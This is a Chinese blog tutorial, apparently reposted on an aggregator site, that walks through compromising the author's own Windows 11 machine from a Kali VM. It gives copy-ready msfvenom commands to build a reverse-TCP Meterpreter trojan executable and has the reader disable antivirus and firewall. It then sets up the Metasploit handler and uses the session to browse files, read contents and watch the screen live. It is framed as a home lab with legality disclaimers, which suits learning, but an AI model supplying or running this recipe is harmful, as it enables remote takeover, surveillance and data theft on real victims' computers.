当前位置: 首页 > news >正文

kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学

本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕

声明:本篇仅仅是将本机作为靶机的一次简易渗透测试,实际情况中基本不可能出现如此简单的木马骇入(往往在上传木马时就被防护功能进行查杀了),况且——任何骇入他人设备的操作都是违法行为,因此仅用作经验分享供学习。

一,确认相关设置

①VMware菜单栏中选择【虚拟机(M)】->【设置(S)】->在网络适配器中确认开启NAT模式

  

 ②控制面板中选择【查看网络状态和任务】->【更改设配器设置

->找到VMnet8网卡,右键【属性】->在属性栏中找到【VMware Bridge Protocol】打开桥接模式,使主机和虚拟机能够互连

③按如下步骤关闭【病毒和威胁防护】与【防火墙和网络保护】,这一步是为了保证待会儿我们上传给本机(靶机)的“小木马”不会被这些强力防护阻拦与清除

进行此步操作请确保本机没有被入侵的风险,笔者写本篇的目的仅为提供经验,

如若出现任何损失,概不负责!


 二,创建木马与上传木马

①打开kali虚拟机,打开终端,输入命令【ifconfig】(注意是if不是ip!)查看虚拟机(攻击机)的ip地址

②输入以下命令,生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

注————

蓝色部分是上一步查看到的虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,任意选择一个不被占用的端口即可;

绿色部分是本次生成的木马文件的名字,任意设置;

(代码块用于快速复制命令:) 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe

出现如下回显说明成功,且在执行命令的工作目录下生成文件,这里我是在桌面目录即【~/Desktop】执行的命令,因此文件直接生成在了桌面上,读者可自行选择目录执行命令

③上传木马到本机(靶机)上,直接采用最直接的拖动法完成上传...

进行这一步时请确保标题一中相关设置的第③步,否则木马文件会被阻拦或清除!


 三,执行命令以监听本机(靶机)

①在kali终端中依次输入以下命令:

msfconsole

use exploit/multi/handler

windows/meterpreter/reverse_tcp

set lhost 192.168.xx.xxx

set lport 9999

exploit

注————

蓝色部分是虚拟机(攻击机)的ip地址,请自行查询并修改;

紫色部分是用于监听本机(靶机)的端口,需要确保和标题二中创建木马时输入的端口相同

 (代码块用于快速复制命令:) 

msfconsole
use exploit/multi/handler
windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xxx
set lport 9999
exploit

②本机(靶机)运行木马文件“上钩”

在上一步中,执行完命令【exploit】后kali将进入连接状态,kali终端显示如下:

此时在本机中运行木马文件即可,运行后kali将成功完成渗透,并进入【meterpreter】状态


四,测试 

①基础浏览

渗透成功后,虚拟机(攻击机)可以实时监控本机(靶机),可以使用Linux基本命令如:【ls】列出本机(靶机)当前目录的文件和文件夹,【cat】命令查看本机(靶机)的文件具体内容...等等,请读者自行摸索测试,可以使用命令【help】获取命令菜单

②实时监控

使用命令【run vnc】将在虚拟机(攻击机)中生成窗口,实时监控本机(靶机)

③退出连接

使用快捷键【Ctrl + Z】将退出对当前靶机的连接,询问是否退出,输入【y】,如下:

④查看已连接设备(即“上钩”靶机)

退出连接状态后,使用命令【sessions】可以列出所有“上钩”靶机,使用命令【sessions -i Id】可以连接指定id的靶机,如"sessions -i 1"将连接Id为1的靶机


尾声

完成测试后记得及时开启【病毒和威胁防护】与【防火墙和网络保护】,防止本机受到病毒或骇客攻击,具体操作见【标题一的第③步】

本篇技术仅用作经验分享,请勿用于任何非法行为!

任何入侵他人设备的操作都是违法行为!

http://www.lryc.cn/news/289368.html

相关文章:

  • 力扣hot100 矩阵置零 标识位
  • Android App开发-简单控件(3)——常用布局
  • Linux使用二进制包安装MySQL
  • 【vue3-pbstar-admin】一款基于vue3和nodejs的简洁后台管理系统
  • 顺序表和链表【数据结构】【基于C语言实现】【一站式速通】
  • SpringBoot 有什么优点?
  • 扫地机器人(二分算法+贪心算法)
  • Unity中创建Ultraleap 3Di交互项目
  • 【Matlab】音频信号分析及FIR滤波处理——凯泽(Kaiser)窗
  • C数据类型
  • JAVA和Go的不解之缘
  • (免费领源码)java#SSM#MySQL汽车车辆管理系统68424-计算机毕业设计项目选题推荐
  • 25考研每日的时间安排
  • 小程序直播项目搭建
  • 《Python 简易速速上手小册》第10章:Python 项目实战(基于最新版 Python3.12 编写)
  • 防御保护第六天笔记
  • 【yaml 文件使用】pytest+request 框架中 yaml 配置文件使用
  • 浅析Redis②:命令处理之epoll实现(中)
  • react如果创建了类似于 Icketang元素,那么该如何实现 Icketang类
  • 「数字化转型」企业架构:成功业务转型的关键
  • AI开启手机摄影新时代:三星Galaxy S24 Ultra影像解读
  • Linux ---- Shell编程之函数与数组
  • Python系列(9)—— 比较运算符
  • uni-app h5对接 thinkphp5接口跨域
  • react-jss书写样式
  • Oracle PL/SQL Programming 第3章:Language Fundamentals 读书笔记
  • 【Spring Boot 3】【@Scheduled】动态修改定时任务时间
  • WordPress如何自定义日期和时间格式?附PHP日期和时间格式字符串
  • log4j2 配置入门介绍
  • 深入Pyecharts:桑基图绘制与炫酷效果实战【第38篇—python:桑基图】